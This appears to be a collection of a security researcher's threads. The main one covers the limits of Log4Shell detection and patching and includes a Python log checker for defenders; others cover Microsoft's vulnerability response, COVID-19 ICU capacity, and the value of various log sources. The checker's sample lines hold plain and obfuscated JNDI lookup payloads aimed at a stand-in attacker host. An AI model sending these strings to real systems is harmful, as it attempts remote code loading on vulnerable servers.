# Block Rules / Log-Based Detection
There's no effective, or rather gapless, way to detect attacks that use log4shell due to the many ways to obfuscate the strings.
Don't put too much trust in any filter/detection pattern. All can be bypassed.
..
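To make the point concrete, here is a small log-line checker (added here as an illustration; it is not code from the thread or from any vendor) that folds the nested Log4j lookup forms it knows about before looking for `jndi:`, so that a plain and a case-mangled string end up matching the same rule. The log lines, the `attacker.invalid` host, and the function names are all constructed for the example. Note what it does not do: any lookup form it has no rule for is left alone, which is exactly the "all can be bypassed" gap the thread describes, so this belongs in the "catch the simple attempts" bucket, not in the "gapless" one.

```python
import re

# Matches the innermost ${...} lookup (no nested braces inside).
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def _resolve(inner: str) -> str:
    """Evaluate one lookup body offline; unknown forms are kept as plain text."""
    # ${lower:X} / ${upper:X} -> X; case is normalised at the end anyway.
    m = re.fullmatch(r"(?i)(lower|upper):(.*)", inner)
    if m:
        return m.group(2)
    # ${name:-X} default-value syntax -> X (covers the empty-name form ${::-X}).
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    # Anything else: drop the wrapper, keep the body (e.g. "jndi:ldap://...").
    return inner


def normalize(s: str, max_rounds: int = 10) -> str:
    """Repeatedly fold innermost lookups until the string stops changing."""
    prev, rounds = None, 0
    while prev != s and rounds < max_rounds:
        prev = s
        s = _LOOKUP.sub(lambda m: _resolve(m.group(1)), s)
        rounds += 1
    return s.lower()


def is_suspicious(line: str) -> bool:
    """Flag a line if, after folding, it carries a JNDI lookup."""
    return "jndi:" in normalize(line)


def scan(lines):
    """Return the indices of log lines that should raise an alert."""
    return [i for i, line in enumerate(lines) if is_suspicious(line)]


# Constructed sample access-log lines (user-agent field at the end).
SAMPLE_LOG = [
    '10.0.0.1 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.2 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://attacker.invalid/a}"',
    '10.0.0.4 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.invalid/a}"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "price is ${price} today"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(f"ALERT line {i}: {normalize(SAMPLE_LOG[i])}")
```

Run against the embedded sample, lines 1 to 3 are flagged and the benign template text on line 4 is not; a plain `jndi:` substring match would have caught only line 1.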
2/ # Behaviour Based Detection
We thought about network based detection, but it could be any remote port and any remote system. Java can have many legitimate outgoing connections & often has suspicious sub-processes.
3/ # Vulnerability Detection
It's difficult to find vulnerable software. It could be the web app, the ticket mgmt that receives contact form content or the backup software. Vuln scanners won't give a complete picture.
Discovery could take months.
Try to use the Canary Tokens.
4/ # Patching
Since it's difficult to determine the vulnerable applications, it'll be difficult to patch what you don't know.
5/ # Post-Exploitation / Compromise Assessments
My best hope is that we can find enough evidence after a successful exploitation. Attackers have goals and try to persist their access on compromised systems. Current tools and frameworks should help us with that.
6/ # Final thoughts
I hope that we can at least filter and detect the simple attempts and prevent some damage.
I wish you all the best in the coming months.
I’d like to clarify my position on #Microsoft in general
Many things have improved over the last 10 years .. a lot .. especially with Windows 10/2016.
Today many fellow security researchers that I highly respect work there.
I criticize Microsoft’s response to recent ..
vulnerabilities (or design flaws) because I care about these things and believe that customers do care too.
I don’t think that it is fair / right to tell them to migrate to the cloud-based solution in order to get rid of these issues.
There are still few but good reasons ..
.. not to opt for the cloud.
I strongly believe that weaknesses in default configs that allow an attacker to escalate privs to Domain Admin should be addressed with a KB patch and not just a pointer to an advisory.
Many won’t read it.
1/x A #COVID19 #OffTopic thread for my followers in countries that still enjoy the quiet before the storm.
It is serious. Don't listen to the voices that play it down.
But also don't panic.
The problem with SARS-CoV-2 is that the treatment of severe cases (~5-10%) requires ..
2/x .. intensive care beds with respirators.
Here in Germany, we have 29k intensive care beds, most of them occupied long before COVID19.
If only 1% of the citizens get sick, that would be 830k citizens, 83k of them with the severe clinical course of the disease.
3/x I guess you can imagine what that means.
Italy is about 10 days ahead of us.
Doctors in Italy decide every morning in a so-called "triage" who gets a bed with a lung ventilator and who doesn't, which is basically a death sentence.
These patients slowly suffocate.
Log Sources Top 5
(ordered by cost-benefit ratio / volume > detectable threats)
1. Antivirus
2. Windows Eventlog (+Sysmon)
3. Proxy
4. Firewall
5. DNS
1/ I'll give some short comments to help you understand the order.
In general: I included only those logs that can already be collected in most organizations when you start a SecMon project.
Bro/Zeek, Suricata, Netflow, etc. would be somewhere between 2 and 4 if available. ..
2/ Some logs are more difficult (cost/effort) to tap into.
E.g., Antivirus logs can often be collected from a single console, while NSM requires high-speed network taps on mirroring ports in central locations (💵). If you have the budget and time, NSM is worth the effort.